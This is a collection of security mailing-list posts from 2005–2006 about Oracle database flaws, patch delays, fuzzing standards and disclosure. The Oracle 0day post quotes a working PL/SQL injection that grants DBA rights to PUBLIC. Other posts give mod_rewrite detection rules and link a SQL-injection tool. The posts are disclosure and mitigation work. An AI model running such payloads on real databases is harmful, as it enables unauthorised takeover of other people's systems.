Hey all, I've just posted an analysis of the 22 Oracle RDBMS flaws patched by the October 2006 Critical Patch Update that was released yesterday: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2006.html. Further, it's a shame to see that, after a promising July 2006 CPU where Oracle had all the patches ready *on time*, they have slipped back into their old, bad habits - patches are not ready for a number of platforms. I thought they'd solved those issues - but clearly not. You can get a copy of the analysis from http://www.databasesecurity.com/oracle/OracleOct2006-CPU-Analysis.pdf, Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ +44(0) 208 401 0070 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ASLR now built into Vista
Address Space Layout Randomization is now part of Vista as of beta 2 [1] . I wrote about ASLR on the Windows platform back in September last year [2] and noted that unless you rebase the image exe then little (not none!) is added. ASLR in Vista solves this so remote exploitation of overflows has just got a lot harder. I've not done a thorough analysis yet but, all going well, this is a fantastic way for Microsoft to go and builds on the work done with NX/DEP and stack cookies/canaries. Cheers, David Litchfield [1] http://msdn.microsoft.com/windowsvista/downloads/products/getthebeta/default.aspx [2] http://www.ngssoftware.com/papers/xpms.pdf ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: How secure is software X?
Hi Justin, One thing you have to keep in mind is that a lot of things are incredibly variable when dealing with this subject. For instance, suppose you want to ensure that the URI in a web server is not overflowable. So you test with something like GET /[A x 4096] HTTP/1.1 Host: foobar.com Connection: close This is all fine and well, unless at 8192 is where the overflow takes place, or if I can stick as many characters as I want in, so long as I am using HTTP 1.1 and not HTTP 0.9, or if I am using HTTP/1.1 and Host doesn't contain a 36 backslashes, et cetera. This is generally why fuzzing is mostly inconclusive because it often misses a lot of conditions and you have essentially assured nothing. Without in-depth analysis of each software package you are basically pushing snake oil. There are just far too many variables to really standardize such a thing. There are a few things to remember: 1) There are still too many products that fall to simple fuzzing. Having a standard that employs fuzzing as part of it means that (hopefully!) vendors will develop at least to that level - this raises the bar so to speak. 2) Not all fuzzers are born equal. Having written a fair few in my time I do realize that condition based fuzzing is important. A very simple but quite common example, to add to the ones you given, is with SMTP fuzzing. Some overflows only trigger after an EHLO greeting but not after a HELO. A good fuzzer and a good fuzzing process should take into consideration as many conditions as possible. 3) Fuzzing would only be part of the standard to be proposed. There are code/assembly scanning tools which can be incorporated amongst other things. Cheers, David Best Regards, Justin Ferguson Reverse Engineer NNSA IARC 702.942.2539 "It is a capital mistake to theorize before one has data. Insensibly one begins to twist facts to suit theories, instead of theories to suit facts." -- Sir Arthur Conan Doyle -Original Message- From: Adam Shostack [mailto:[EMAIL PROTECTED] Sent: Friday, May 12, 2006 11:35 AM To: David Litchfield Cc: bugtraq@securityfocus.com; full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]; [EMAIL PROTECTED] Subject: Re: How secure is software X? Hi David, Very briefly because I'm swamped today: Please consider bringing some of this to Metricon (https://securitymetrics.org/content/Wiki.jsp?page=Welcome) Also there's a project of US DHS/NIST and probably others called SAMATE Software Assurance Metrics and Tool Evaluation http://samate.nist.gov/index.php/Main_Page which might be of interest. Adam On Fri, May 12, 2006 at 02:59:17AM +0100, David Litchfield wrote: | How secure is software X? | | At least as secure as Vulnerability Assessment Assurance Level P; or Q | or | R. Well, that's what I think we should be able to say. What we need is an | open standard, that has been agreed upon by recognized experts, against | which the absence of software security vulnerability can be measured - | something which improves upon the failings of the Common Criteria. Let's | choose web server software as an example. When looking for flaws in a new | piece of web server software there are a bunch of well known checks that | one would throw at it first. Try directory traversal attacks and the | several variations. Try overflowing the request method, the URI, the query | string, the host header field and so on. Try cross site scripting attacks | in server error pages and file not found messages. As I said, there's a | bunch of checks and I've mentioned but a few. If these were all written | down and labelled with as a "standard" then one could say that web server | software X is at least as secure as the standard - providing of course the | server stands up. | | For products that are based upon RFCs it would be trivial to write a | simple | criteria that tests every aspect of the software as per the RFCs. This | would be called Vulnerability Assessment Assurance Level: Protocol. If a | bit of software was accredited at VAAL:Protocol then it would given a | level of assurance that it at least stood up to those attacks. | | Not all products are RFC compliant however. Sticking with web servers, | one | bit of software might have a bespoke request method of "FOOBAR". This opens | up a whole new attack surface that's not covered by the VAAL:Protocol | standard. There are two aspects to this. Anyone with a firewall capable of | blocking non-RFC compliant requests could configure it to do so - thus | closing off the attack surface - from the outside at least. As far as the | standards go however - you'd have to introduce criteria to cover that | specific functionality. And what about different application environments | running on top of the web server? And what about more complex products such | as database servers? I suppose at a minimum for DB software you could at | least have a stand
Re: [Full-disclosure] How secure is software X?
From: "Michael Silk" <[EMAIL PROTECTED]> why do we need this? Take your average bit of common software. I can bet someone's thrown Spike at it, someone else crazyfuzz, and another foofuz. Now let's say that it stood up to everything that was thrown at it - and let's say another product crumbled in the first few seconds. I'd rather have the first product on my network if, as a business requirement, I need the functionality that that software provided. Sure - it's not a guarantee that it's devoid of security vulnerability but I can be assured that the software's not going to fall to a script kiddie. If a product did stand up the Spike, crazyfuzz and foofuzz then let's talk about it! The problem is you only ever hear about when these fuzzers actually find things. What I'm suggesting is simply collating our bug-hunting collective knowledge into a standard. Those who wish to protect their "trade secret bug find techniques" don't have to play if they don't want. But in answering "why do we need this?" you clearly don't - but there are people out there that do need this - or at least would like it. you're referring to what already takes place commercially. "hi i want a security assessment". who's going to do these assessments for free? who confirms that the people doing the assessment know what they are doing? The thing with a standard is that it is a standard. A such efforts should be entirely reproducible. Have 3 or more people follow that standard and compare results at the end. If there's a discrepancy someone's not following the standard. The other aspect of course that it's trivial to write and verify tools that follow a standard. "Customer: I was hacked .." -> me: -> "David Litchfield told me it was secure, blame him" -> "David Litchfield: Oh no, our VAAL is just a guide." -> "Customer: So why the hell do I care about it then?" Guides for people to use are okay (hello OWASP Guide, and others) but all your trying to start is a non-commercial free security assessment service. Absolutely. Let's face it - it's what goes on every day, anyway. At least people who care about assurance would be able to make something useful out of all that effort. Besides, who said it had to be free? Like CC - if a company wanted their product evaluated they could pay for it. Or not. I'm sure cost will become relevant at some point but not now. I'm more interested in the technical merits at the moment. Cheers, David Litchfield http://www.databasesecurity.com/ http://www.ngssoftware.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] How secure is software X?
How secure is software X? At least as secure as Vulnerability Assessment Assurance Level P; or Q or R. Well, that's what I think we should be able to say. What we need is an open standard, that has been agreed upon by recognized experts, against which the absence of software security vulnerability can be measured - something which improves upon the failings of the Common Criteria. Let's choose web server software as an example. When looking for flaws in a new piece of web server software there are a bunch of well known checks that one would throw at it first. Try directory traversal attacks and the several variations. Try overflowing the request method, the URI, the query string, the host header field and so on. Try cross site scripting attacks in server error pages and file not found messages. As I said, there's a bunch of checks and I've mentioned but a few. If these were all written down and labelled with as a "standard" then one could say that web server software X is at least as secure as the standard - providing of course the server stands up. For products that are based upon RFCs it would be trivial to write a simple criteria that tests every aspect of the software as per the RFCs. This would be called Vulnerability Assessment Assurance Level: Protocol. If a bit of software was accredited at VAAL:Protocol then it would given a level of assurance that it at least stood up to those attacks. Not all products are RFC compliant however. Sticking with web servers, one bit of software might have a bespoke request method of "FOOBAR". This opens up a whole new attack surface that's not covered by the VAAL:Protocol standard. There are two aspects to this. Anyone with a firewall capable of blocking non-RFC compliant requests could configure it to do so - thus closing off the attack surface - from the outside at least. As far as the standards go however - you'd have to introduce criteria to cover that specific functionality. And what about different application environments running on top of the web server? And what about more complex products such as database servers? I suppose at a minimum for DB software you could at least have a standard that simply checks if the server falls to a long username or password buffer overflow attempt and then fuzz SQL-92 language elements. It certainly makes standardization much more difficult but I think by no means impossible. Clearly, what is _easy_ is writing and agreeing upon a VAAL:Protocol standard for many different types of servers. You could then be assured that any server that passes is at least as secure as VAAL:Protocol and for those looking for more "comfort" then they can at least block non-RFC compliant traffic. Having had a chat with Steve Christey about this earlier today I know there are other people thinking along the same lines and I bet there are more projects out there being worked on that are attempting to achieve the same thing. If anyone is currently working on this stuff or would like to get involved in thrashing out some ideas then please mail me - I'd love to hear from you. Cheers, David Litchfield http://www.databasesecurity.com/ http://www.ngssoftware.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] MS06-019 - How long before this develops into aself propagating email worm
> "Thereees zero-day in the wild, you're going to get haxx3d" It's more like "We now know about a zero-day that's been on the loose for some unknown amount of time, and you may already be hax0red. And if you haven't, you probably will be as soon as the script kiddies who are even more lame than our security professionals find the zero-day. HAND". Code alone is not a threat. Its obvious these security companies never have specific intelligence of worms being planned. All they can base their threat meters on is a generalization. Which one is the threat: "A gun store has opened on the corner, someone might buy a gun and shoot" or "I overheard a conversation that johnny average is annoyed at bob and spoke about revenge, he's really into snip They both are. The first is, of course, more general and is based upon increased _opportunity_. The second is a specific threat based upon specific intelligence. Bringing this back to the world of computer security: most major Internet worms that use an overflow as their vector have exploit previously announced flaws - with a patch being available - for example Blaster, Slammer, Code Red. With the current situation, we have increased opportunity: that is, there is a pre-authentication attack vector in a commonly used product which is not commonly firewalled. In other words, almost all the right ingredients for an Internet worm. If passed experience is anything to go by the only missing ingredient is proof of concept code released by a well meaning security researcher! Cheers, David Litchfield ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle - the last word
A few people have asked me recently what it is I'm actually looking for from Oracle. I have a nice little laundry list of things, of course, but mostly all I've been waiting for is to hear Oracle to say, "We admit we have a problem with regards to security, but here's our strategy and we're going to make it better." In that simple admission would lie the cessation of my criticism of Oracle. But, let's face it, it's not a simple admission in reality. As a business, Oracle can't say, "Oops. We've been mistaken all these years - turns out our database isn't a secure as we actually thought." A company like Microsoft can, and indeed did, something just like that but their business was never built on what was supposed to be a reputation for and a foundation of security. It would be business suicide for Oracle to do this. After much rumination, the obvious struck me: Oracle could make their product more secure (and improve the behind-the-scenes processes that enable them to deliver a secure product) and all the while admit to nothing. Whilst I've been throwing tantrums at their failure to admit to the truth, Oracle has been working on doing this. It almost passed me by. They're not there yet but they are getting closer. Let me put that in concrete terms: When Oracle 10g Release 1 was released you could spend a day looking for bugs and find thirty. When 10g Release 2 was released I had to spend two weeks looking to find the same number. Soon, and I have no time frame in mind for "soon", Oracle will have "arrived" at a point where sitting down and finding a single bug will take a month - and not once would they have had to admit to having problems with security. They'll have solved it. Their tools will be tight and their processes slick. They'll almost be Unbreakable. I'm sure the strategists at Oracle must have realized this - for an organization such as Oracle it's really the only reasonable option available. Okay, it's not the open strategy that I'd have preferred but, in the end, the journey of how they got/get there, to a secure robust product, is irrelevant. Another thing that struck me was the amount of effort and time that it must have taken to get a lumbering stegosaurus of a beast like Oracle to turn around. I can only assume that, as CSO, Mary Ann must credited with that, and as such, I revise my position on her. Dare I say it, well done, Mary. I realize now that this is how it's going to be - I'm not going to get my much sought after admission but at least we get a better, more secure product we can be more confident in. Besides, I weary of "Oracle bashing" and I've no doubt that I've wearied many here on these list over the years, too. NGS will, of course, continue to research and find Oracle security flaws, report them and help Oracle to fix them but, from now on, I'll leave the proselytizing to others. Oracle have moved sufficiently forward enough, and with enough momentum (now), that I believe they've passed the point of no return and can do nothing but eventually end up where we all want them to be. Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ +44(0) 208 401 0070 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Oracle, where are the patches???
A regular patch release cycle is a good thing. It allows system administrators to plan ahead and minimize server downtime. If I, as a system administrator, know that on the 18th of April 2006 a critical patch is going to be released I'll plan to stay late at work that night and start the assessment of the patch before I install it. All going well, I can install the patch and reboot the server all with a minimum amount of downtime. This should happen once a month or once a quarter - whatever interval my vendor has chosen. That's what good regular patches allow me to do. The benefits are absolutely clear. There are two major problems that can cause these benefits to evaporate into thin air, however. These are 1) Late Patches - If patches aren't delivered on the day they were supposed to be, then all my planning ahead has gone to waste and a new plan needs to be scheduled. 2) Re-issued Patches - If a vendor has to reissue a patch then I have to reinstall it - which costs me more money and more server downtime. The more times the patch is re-issued the more it eats into my budget. Since starting its regular quarterly patch release cycle Oracle has been guilty of both. Most recently, Oracle informed us that on the 18th of April 2006 that Critical Patch Update would be released. This date had been planned for over a year so why, on that date, were patches not ready for versions 10.2.0.2, 10.1.0.4, 10.1.0.3, 9.2.0.5, 8.1.7.4 and only partial patches for 10.1.0.5? Further, patches were only available for versions 9.2.0.7, 9.2.0.6 and 10.2.0.1 which means patches are available for only 33% of their supported versions - what about the poor people running the other 66%? These 66% were told that their patches would be available on the 1st of May 2006. In all fairness, the 1st of May was an "Estimated Time of Arrival" - but boy - was that estimate way off! The ETA has now been revised to the 15th of May - a whole month after the supposed patch release day. What about Oracle's track record on patch re-issuance? Let's look - the January 2006 critical patch update was re-issued seven times, the October 2005 CPU three times and the July 2005 CPU was re-issued nine times. The story is the same for earlier CPUs. Mary, Mary, quite contrary to what you'd have us believe about Oracle's security track record, it's not looking too good from my view. Cheers, David Litchfield NGSSoftware Ltd http://www.ngssoftware.com/ +44 (0) 208 401 0070 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Recent Oracle exploit is _actually_ an 0day with no patch
The recent Oracle exploit posted to Bugtraq
(http://www.securityfocus.com/archive/1/431353) is actually an 0day and has
no patch. The patch for 10g Release 2 for April 2006 Critical Patch Update
does _not_ contain a fix for the specific flaw that the exploit takes
advantage of. As it happens - this specific flaw was reported to Oracle on
the 19th of February 2006.
It is incredible how, for such a small package, DBMS_EXPORT_EXTENSION has
had so many problems that Oracle have been unable to fix. Let's look at the
history.
On the 13th April 2004 I reported a SQL injection vulnerability to Oracle in
the GET_DOMAIN_INDEX_METADATA function of this package. Oracle released a
"fix" for this in Alert 68 (August 2004) - but it turns out the fix was not
sufficient. I alerted Oracle to this problem on the 18th of February 2005.
They again attempted to fix these flaws - this time in the October 2005 CPU.
On the 30th of October I reported that the problems were still not fixed
properly. They then tried to fix it again in the January 2006 CPU - but
again there were still issues left. I reported this on 19th of February
2006. I was told the April 2006 CPU contained a fix - but it still
vulnerable.
At the end of this mail are copies of my communications with Oracle with
regards to the flaws in this package. It is unfortunate that Oracle did not
take the opportunity to fix the flaws first time around. It is amazing
Oracle didn't fix them second time around. It is disgraceful, IMO, that they
didn't fix them properly third time around.
I call upon Oracle to "pull their finger out" and get on with delivering
their customers a proper patch - one that finally puts these issues to bed.
In the meantime, revoking the PUBLIC execute permission from this package
will help mitigate the risk.
Cheers,
David Litchfield
NGSSoftware Ltd
http://www.ngssoftware.com/
+44(0)208 401 0070
** Oracle's response to 13/04/2004 report **
Thanks David. This will also be investigated. This will be reference number
2004S141E.
Andrew
Oracle Security Alerts
On 04/13/2004 06:17 PM, David Litchfield wrote:
> Howdy,
> The DBMS_EXPORT_EXTENSION owned by SYS is vulnerable to PL/SQL
> injection that allows a low priv user to become a DBA. It executes a
> block of anonymous PL/SQL that we can insert something like EXECUTE
> IMMEDIATE ''grant dba to public'' in.
>
> DECLARE
> NB PLS_INTEGER;
> BUF VARCHAR2(2000);
> BEGIN
> BUF:=
> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA('FOO','SCH','FOO',
> 'EXFSYS"."EXPRESSIONINDEXMETHODS".ODCIIndexGetMetadata(oindexinfo,:p3,
> :p4,ENV); EXCEPTION WHEN OTHERS THEN EXECUTE IMMEDIATE ''GRANT DBA TO
> PUBLIC'';END; --','VER',NB,1); END; /
>
> When this query runs, the query in GET_DOMAIN_INDEX_METADATA returns
> 'no data' so we handle the exception using 'when others' and grant dba
> to public in the exception block.
>
> Cheers,
> David
>
** Oracle's response to 18/02/2005 report **
Hi David,
We received four emails from you Friday which we are investigating. You
believe that the issues are more general cases of bugs that were fixed in
Alert 68, but we think at least one issue you reported on Friday is new. We
normally get tracking numbers to you promptly, but these issues are taking
longer because it's unclear if we should re-open the old tracking numbers
(because it is an extension of the old issue) or track as new issues. We
will get back to you with tracking numbers once we have a definitive answer.
I appreciate your patience.
Regards,
Darius Wiles
Security Alerts Manager
David Litchfield sent the following message on 02/23/2005 12:53 PM:
> Just wondering if anyone's there and whether this mail (and the others
> sent on Friday) were received?
> Cheers,
> David
> - Original Message - From: "David Litchfield"
> <[EMAIL PROTECTED]>
> To: "'Oracle Security Alerts'" <[EMAIL PROTECTED]>
> Cc: <[EMAIL PROTECTED]>
> Sent: Friday, February 18, 2005 3:52 PM
> Subject: Patch is broken for
> DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA
>
>
>> The patch for alert 68 "fixed" the
>> DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA SQL injection
>> problem; I put "fixed" in quotes because it's not fixed.
>>
>> Here's the original problem:
>>
>> The DBMS_EXPORT_EXTENSION owned by SYS is vulnerable to PL/SQL
>> injection that allows a low priv user to become a DBA. It executes a
>> block of anonymous PL/SQL that we can insert something like EXECUTE
>> IMMEDIATE ''grant dba to public'' in.
>>
>> DECLARE
>&
[Full-disclosure] Multiple critical and high risk issues in Oracle's database server
NGSSoftware has discovered multiple critical and high risk vulnerabilities in Oracle's Database Server. Versions affected include Oracle Database 10g Release 2, versions 10.2.0.1, 10.2.0.2 Oracle Database 10g Release 1, versions 10.1.0.4, 10.1.0.5 Oracle9i Database Release 2, versions 9.2.0.6, 9.2.0.7 Oracle8i Database Release 3, version 8.1.7.4 Oracle has released a patch that addresses these issues. The announcement of this patch can be found here: http://www.oracle.com/technology/deploy/security/pdf/cpuapr2006.html Patches can be downloaded from the Metalink website - http://metalink.oracle.com/. NGSSoftware are going to withhold details about these flaws for three months. Full details will be published on the Tuesday, 18th of July 2006. This three month window will allow Oracle database administrators the time needed to test and apply the patch set before the details are released to the general public. This reflects NGSSoftware's approach to responsible disclosure. Our stated policy can be found here: http://www.ngssoftware.com/disclosure.pdf NGSSQuirreL for Oracle, NGSSoftware's advanced vulnerability assessment scanner and security manager for Oracle, has been updated to check for and positively identify these flaws in Oracle database servers on the network. More information about NGSSQuirreL for Oracle can be found at http://www.ngssoftware.com/squirrelora.htm. NGSSoftware Insight Security Research http://www.ngssoftware.com/ +44(0)208 401 0070 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Advisory - -Thu Mar 16 14:27:08 EST 2006- - Buffer Overflow in Microsoft Excel
Advisory - -Thu Mar 16 14:27:08 EST 2006- - Buffer Overflow in Microsoft Excel 1. BACKGROUND There has had been no background. 2. WORKAROUND This vulnerability has no workarounds. 3. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2006-956531 to this issue ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] More on the workaround for the unpatched Oracle PLSQL Gateway flaw
According to Oracle, the workaround I posted, that prevents exploitation of
a critical vulnerability that Oracle has so far failed to fix, breaks
certain applications that sits atop their PLSQL Gateway. Though my
workaround prevents exploitation of the critical flaw and thus protects
vulnerable systems against attack, Oracle has made no effort to furnish me,
or anyone else for that matter, with more information on how the workaround
breaks some of their applications. As such, improving the workaround so it
doesn't break these few applications has been mildy annoying. But I think
I've tracked it down. The workaround as is
RewriteEngine on
RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack
will trigger if a right facing bracket ')' appears in the PATH_INFO or
_anywhere_ in the query string. Thus, if the value of a query string
parameter contains a bracket the workaround will trigger. As far as the flaw
is concerned, we need only concern ourselves with brackets that appear in
the query string parameter name - not in the value for the parameter name.
As such, if we modify the workaround to
RewriteEngine on
RewriteCond %{QUERY_STRING} ^.*\).*=|.*%29.*=$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack
we can prevent exploitation if the query string parameter name has a bracket
whilst still allowing brackets it the paramter value. This can be tidied up
to read
RewriteEngine on
RewriteCond %{QUERY_STRING} \).*=|%29.*=
RewriteRule .? http://127.0.0.1/denied.htm?attempted-attack
RewriteRule \)|%29 http://127.0.0.1/denied.htm?attempted-attack
# Thanks, Mike Pomraning!
For those that haven't been able to adopt the workaround because it would
break their specific application, then the modified workaround should work
in your situation.
Cheers,
David Litchfield
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] The History of the Oracle PLSQL Gateway Flaw
to know in advance everything that is bad and should be black listed. It's a much easier proposition to know what is not bad though and only allow access to this. This is a "white list" solution and I've been asking Oracle to give us a white list solution to this problem for four years now - but they still haven't done it. Explaining this further - let's say my web plsql application consists of one package called "banking" and this package has a number of procedures that implement typical banking tasks such as "transfer", "pay", "show_balance", etc, etc. If I had a white list solution then I could say allow access if and only if the web users request starts with "banking" and reject everything else. This is an entirely much more secure and robust solution than the "black list" approach. Will we ever be given this as a solution? Who knows. As it seems providing a decent security solution is beyond Oracle at the moment - I'm not holding my breath. Come on Oracle - get your stuff together! Cheers, David Litchfield ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Workaround for unpatched Oracle PLSQL Gateway flaw
There's a critical flaw in the Oracle PLSQL Gateway, a component of iAS, OAS
and the Oracle HTTP Server, that allows attackers to bypass the
PLSQLExclusion list and gain access to "excluded" packages and procedures.
This can be exploited by an attacker to gain full DBA control of the backend
database server through the web server.
This flaw was reported to Oracle on the 26th of October 2005. On November
the 7th NGS alerted NISCC (http://www.niscc.gov.uk) to the problem. It was
hoped that due to the severity of the problem that Oracle would release a
fix or a workaround for this in the January 2006 Critical Patch Update. They
failed to do so.
The workaround is trivial; using mod_rewrite, which is compiled into
Oracle's Apache distribution it is possible to stop the attack. The
workaround checks a user's web request for the presence of a right facing
bracket, ')'.
Add the following four lines to your http.conf file then stop and restart
the web server
RewriteEngine on
RewriteCond %{QUERY_STRING} ^.*\).*|.*%29.*$
RewriteRule ^.*$ http://127.0.0.1/denied.htm?attempted-attack
RewriteRule ^.*\).*|.*%29.*$ http://127.0.0.1/denied.htm?attempted-attack
I don't think leaving their customers vulnerable for another 3 months (or
perhaps even longer) until the next CPU is reasonable especially when this
bug is so easy to fix and easy to workaround. Again, I urge all Oracle
customers to get on the 'phone to Oracle and demand the respect you paid
for.
Cheers,
David Litchfield
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] AIX Heap Overflow paper
I've just published a paper on AIX heap overflows. I wrote it back in August but wanted to wait until a couple of flaws I discovered whilst researching the topic were fixed by IBM. IBM released the patches today. You can get the paper at http://www.databasesecurity.com/dbsec/aix-heap.pdf Cheers, David Litchfield ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Snagging Security Tokens to Elevate Privileges
I've just put up a Database Security Brief; the first of many to come. http://www.databasesecurity.com/dbsec-briefs.htm It's called a brief because there's enough meat to make it interesting but not enough to make it a paper ;) This brief, Snagging Security Tokens to Elevate Privileges, details how a database server running as a low privileged user on Windows can still provide an attacker with the ability to gain elevated privileges on the network and suggests a change it security policy to mitigate the risk. As a side note, this affects all network servers that offer OS based authentication - not just database servers. Cheers, David ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Framework for the aid of exploiting SQL injection
Hi Roman, Is there any recommended tool which helps to get databases tables, entries, structure, etc, given a particular SQL injection bug in one application? I mean, it should *automatically* try different sentences to figure out the names of the columns and in general, other useful info from the database. Perhaps a PoC of some of NGSSoftware's papers or a more elaborated tool... I've just put up sqlinjector.zip on the databasesecurity.com website ( http://www.databasesecurity.com/webapplications.htm ). This is the tool (source and exe) you refer to. I never got around to completing it but it works as is - I'd rather the code was tidier. HTH, David ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Database servers on XP and the curious flaw
Hi Eliah, David Litchfield wrote: Hey all, I've just put up a paper on a curious flaw that appears when running a My intent is not to MS-bash here, but perhaps Microsoft is to blame for not educating people about this issue. (If they had, your paper would be superfluous.) Usually if millions of users are insecure because they don't know something, someone is to blame. To be honest I don't think we're talking millions of people. How many people at home run a fully fledged RDBMS on their XP systems? Very few I'd guess. Besides, Simple File Sharing is documented so MS are educating those willing to seek information. Cheers, David http://www.databasesecurity.com/ http://www.ngssoftware.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Database servers on XP and the curious flaw
Hey all, I've just put up a paper on a curious flaw that appears when running a database server on Windows XP with Simple File Sharing enabled. The flaw essentially allows a remote attacker to gain access to the database, sometimes with DBA privileges, without knowledge of a valid password. To be honest, no-one is really to blame; it's just one of those cases where you take two disparate mechanisms, shake them up, add a dash of lime and serve up. The paper can be found here http://www.databasesecurity.com/dbsec-papers.htm and is entitled "Database Servers on Windows XP and the Unintended Consequences of Simple File Sharing". It doubles-up as my entry for the "Longest Title" award. Cheers, David Litchfield http://www.databasesecurity.com/ http://www.ngssoftware.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Not the real n3td3v
Will the real n3td3v please stand up, please stand up? ... couldn't resist... sorry David ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Three years and ten months without a patch
Whilst looking over old Oracle bugs I discovered that a _fully_ _patched_ 8.1.7.4 Oracle server is still vulnerable to the old extproc flaw [http://www.ngssoftware.com/advisories/oraplsextproc.txt]; this flaw, when exploited, allows a remote attacker without a userID and password to take control of the server. Why, you may ask, has a supported product gone for so long without a patch for a serious problem that was made public 3 years and 10 months ago and reported to Oracle over 4 years ago? The answer, according to Alert 57 [http://www.oracle.com/technology/deploy/security/pdf/2003alert57.pdf], is that Oracle outright decided not to fix it. They claim "architectural constraints" are the problem even though they managed to overcome these same constraints on newer versions of Oracle. Users of 8.1.7.4 would do well to heed the advice offered in Alert 57 if they've not already done so. Cheers, David Litchfield http://www.databasesecurity.com/ http://www.ngssoftware.com/ More commentary on this available here http://www.databasesecurity.com/oracle-commentary.htm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: [AppSecInc Advisory MYSQL05-V0002] Buffer Overflow in MySQL User Defined Functions
Buffer Overflow in MySQL User Defined Functions Risk level: LOW Credits: This vulnerability was discovered and researched by Reid Borsuk of Application Security Inc. How can this even be marked as low risk? If you're loading a library into mysql's address space then you're already executing "arbitrary code". It's important that we, as security researchers, don't desensitize the readership with pointless "vulnerability" posts otherwise people begin to turn off. Sure - you've found some sloppy code in mysql - get it looked at by all means but please don't try to create a risk, whether low or not, where there really is none. Cheers, David "got out of the wrong side of bed this morning" Litchfield ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
